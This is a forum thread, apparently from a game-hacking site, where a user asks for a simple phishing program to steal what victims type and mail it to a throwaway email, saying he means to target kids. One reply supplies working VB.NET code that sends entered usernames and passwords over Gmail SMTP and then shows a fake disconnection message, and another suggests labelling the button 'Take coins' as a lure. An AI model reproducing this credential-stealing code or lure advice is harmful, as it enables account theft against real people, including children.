TUTORIALPhishing Program

Posts 112 of 12 · Page 1 of 1
Phishing Program
I just want a simple tutorial with very smalls steps to achieve a phishing program. To steal information that someone puts in and it sends all the information to an expendable email.
First off I'm pretty sure that this breaks rules of MPGH. Secondly if you really want to do it, just google it or search on youtube. You'll get more results from there.
Quote Originally Posted by gtaplayer2 View Post
First off I'm pretty sure that this breaks rules of MPGH. Secondly if you really want to do it, just google it or search on youtube. You'll get more results from there.
This is a hacking site where we make programs and help others to make programs that can do many things, if you are a hacker then you should know that this a complete scam and I only want to troll some kids.

Also, I have checked youtube, google, even this site but I couldn't find anything, I'm either to lazy or there really isn't something here.
The only thing I'm asking for is lines of code that send small kinds of information to an expendable email which I have already set up.
Code:
Imports System.Net.Mail

If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("DIsconnected From Server, Please try again later!")
Hopefully this is what you are asking for.
Quote Originally Posted by georgelabra View Post
Code:
Imports System.Net.Mail

If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("DIsconnected From Server, Please try again later!")
Hopefully this is what you are asking for.
I have the code, now where do I put it. I have a 1 progress bar, 3 Radio buttons, 1 button, 4 labels, 2 text boxes for their information to be typed in. That's all I want, their information that the have typed in the two boxes
Also this is the current code I have:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WindowsFormsApplication2
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}

private void Form1_Load(object sender, EventArgs e)
{

}

private void button1_Click(object sender, EventArgs e)
{

}
}
}
Quote Originally Posted by Durdan View Post
Also this is the current code I have:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WindowsFormsApplication2
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}

private void Form1_Load(object sender, EventArgs e)
{

}

private void button1_Click(object sender, EventArgs e)
{

}
}
}
serisouly can't you use [code] [/code ] ?
Quote Originally Posted by pleasereturnmythong View Post
serisouly can't you use [code] [/code ] ?
Fite me at pax (╯°□°)╯︵ ┻━┻

Forgot about that feature.
Just put the code in a button that says " Take coins" or something idk what u're making. But change the code and put your gmail in it.
Its illegal to do that bro!! and becareful when doing it!!
@Durdan One if you're looking for an application then it would be called a RAT. Remote Administative Tool. Secondly anybody who downloads these things just decompiles em to get access to the email. Thirdly if you're looking for a website tool (Phishing). It got that nickname because anybody in their right mind doesn't give out their info on the internet. Good luck cause those are programmed in 2 different languages, html and php. Both semi-hard languages to learn.
Quote Originally Posted by Smileyblaster View Post
@Durdan One if you're looking for an application then it would be called a RAT. Remote Administative Tool. Secondly anybody who downloads these things just decompiles em to get access to the email. Thirdly if you're looking for a website tool (Phishing). It got that nickname because anybody in their right mind doesn't give out their info on the internet. Good luck cause those are programmed in 2 different languages, html and php. Both semi-hard languages to learn.
I understand but the only thing I would say against this is that I have an expendable email. Thanks for telling me this. I might as well just give this up. I don't have that much time on my hands
Posts 112 of 12 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?